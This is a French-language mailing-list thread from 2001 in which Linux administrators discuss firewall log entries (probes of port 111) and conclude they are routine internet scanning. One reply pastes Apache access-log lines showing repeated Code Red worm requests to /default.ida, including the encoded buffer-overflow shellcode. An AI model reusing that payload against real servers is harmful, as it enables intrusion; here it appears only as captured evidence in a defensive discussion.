tiens tiens cela ressemble à du Nimda http://solutions.journaldunet.com/0109/010925_nimda.shtml Bien à vous Philippe http://www.devparadise.com/ ----- Original Message ----- From: "Olivier Thauvin" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Wednesday, September 26, 2001 11:05 AM Subject: Re: [Confirme] Message d'audite - Est-on entrain de me scanner ou pire !!!! > Tu aura toujours plein de tentatives de connexion, voulues ou non, le mieux est limiter tes log avec iptables, même sur le réseau interne j'ai des rejets parce qu'un soft tente tout un broadcast. > Alors oui tu est parano, mais c'est qu'un admin système doit être un temps soit peu parano mais voici une vrai tentative d'attaque: > > [root@andromede olivier]# host andromede > andromede.x.x.fr. has address 134.157.x.x > [root@andromede olivier]# grep default.ida /var/log/httpd/acc > access_log access_log.1 access_log.2 access_log.3 access_log.4 access_log.5 > [root@andromede olivier]# grep default.ida /var/log/httpd/access_log > 209.225.6.135 - - [04/Sep/2001:12:41:21 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 310 "-" "-" > 209.225.6.135 - - [04/Sep/2001:12:45:17 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 310 "-" "-" > 209.225.6.135 - - [04/Sep/2001:12:48:50 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 310 "-" "-" > 209.225.6.135 - - [04/Sep/2001:12:49:03 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 310 "-" "-" > 61.75.50.58 - - [04/Sep/2001:13:33:40 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 310 "-" "-" > 134.157.x.x - - [04/Sep/2001:16:46:15 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 310 "-" "-" > 134.157.x.x - - [04/Sep/2001:17:02:17 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 310 "-" "-" > > Vous aurez reconnu code red, vous verez aussi que certaines machine du réseau (hors de notre service, nous n'avons pas de NT) tente de pirater mon apache. > > Le Mercredi 26 Septembre 2001 00:03, vous avez écrit : > > >>Bordel çà continue !!!! > > >> > > >>Encore de nouveau audit et cette fois c'est pas du ping ! Suis-je parano > > >> ? Mon adresse ppp0 était 217.128.242.xxx > > >> > > >> > > >>1er Audit : > > >>auditIN=ppp0 OUT= MAC= SRC=209.81.60.xxx DST=217.128.242.xxx > > >>LEN=60 TOS=0x00 PREC=0x00 TTL=44 ID=47603 DF PROTO=TCP SPT=3086 > > >>DPT=111 WINDOW=32120 RES=0x00 SYN URGP=0 > > >> > > >>2eme Audit : > > >>auditIN=ppp0 OUT= MAC= SRC=209.81.60.xxx DST=217.128.242.xxx > > >>LEN=60 TOS=0x00 PREC=0x00 TTL=44 ID=49173 DF PROTO=TCP SPT=3086 > > >>DPT=111 WINDOW=32120 RES=0x00 SYN URGP=0 > > >> > > >>Ok la différence c'est l'ID (du paquet ?) et la WINDOW (fenêtre > > >>d'anticipation ?) > > >> > > >>En gros, est-ce que je m'inquiète encore de trop ou y-a-t-il matière à > > >>s'inquiéter ? > > >> > > >>Ou pourrai-je trouver les infos nécessaires au décryptage de ces paquets > > >>(type, cause, > > >>source d'inquiétude ou non, ....) > > >> > > >> > > >>Merci > > >> > > >>José HERBRECHT > > >>(Le parano ?) > > > > > >Je viens de lancer une session http://209.81.60.xxx sur l'adresse et y a > > > un serveur Apache qui tourne. Est-ce que cette personne ne serai pas > > > entrain > > > > de > > > > >tester son serveur :-) ? > > > > Salut, > > > > Je crois que tu te fait un ulcere pour rien....... pour l'instant du moins > > ;-) > > Je ne vais pas rentrer ds les détails du port 111, ce n'est pas ce qui es > > important a mon avis ds ton histoire. > > Non plus sérieusement, voila l'exemple de ce que j'appel personnellement le > > feu d'internet. > > En clair qu'est ce qui se passe : il y a maintes tentatives de connection > > faites par des personnes scannant l'internet, ou des portions pour être > > plus précis. Cela leur permet de découvrir de la manière la plus > > sytématique possible afin de découvrir une machine ayant des ports ouverts, > > connus pour certaines faiblessse de sécurité. Il peut y avoir des scan > > complet ou aléatoire, mais bon.... on ne va pas rentrer ds les détails car > > on s'éloigne du sujet la. > > Ce que tu vois la n'est pas grand chose. Personnelement j'ai mes logs > > remplis chaques jours de tentative de connexions venant des 4 coins de la > > planete et qui sont des résultats de scan automatique. > > > > Mais un autre phénomène peu expliquer ce genre d'apparition ds les logs. En > > effet lorsque tu te connecte sur un serveur de chat, par exemple, il n'es > > pas rare que ce dernier essaie de se connecter sur qq port bien connu de ta > > machine. Par exemple ca peut être le port 8080 pour voir si t'es pas > > derrière un proxy, port d'authentification, ect... le port 111 (port Sun > > RPC) n'est généralement pas utilisé par ce genre de serveur de chat. cela > > n'étais qu'une apparté mais qui pourrais t'être utile un jour.. ;-) > > > > Donc il en résulte que lorsque tu met en place un firewall, soit LE PLUS > > RESTRICTIF POSSIBLE!!!! afin d'éviter aux scans voir les ports ouverts. Ds > > ton cas, il existe des exploits contre le port 111, mais tant que le demon > > serveur ne tourne pas et surtout que tu es protégé par ton firewall, rien a > > craindre. > > > > Reste vigilant pour voir toute dérive (par exemple un scan complet de tt > > tes ports pas une même ip) mais pas d'alarmisme non plus. > > > > En éspérant t'avoir un peu aidé. > > > > > > _________________________________________________________ > > Do You Yahoo!? > > Get your free @yahoo.com address at http://mail.yahoo.com > > ---------------------------------------- > Content-Type: text/plain; charset="iso-8859-1"; name="message.footer" > Content-Transfer-Encoding: 8bit > Content-Description: > ---------------------------------------- > > -- > Olivier Thauvin-CNRS Service Aeronomie > [EMAIL PROTECTED] > Téléphone: > 01 64 47 43 60 à Verrières (lundi,mercredi et vendredi) > 01 44 27 47 59 à Jussieu (Mardi et Jeudi) > > Service d'Aéronomie > Réduit de Verrieres - BP 3 > Route des Gatines > 91371 Verrieres le Buisson Cedex > France > > Fax:33 (0)1 69 20 29 99 > > ---------------------------------------------------------------------------- ---- > Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? > Rendez-vous sur "http://www.mandrakestore.com" >
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com"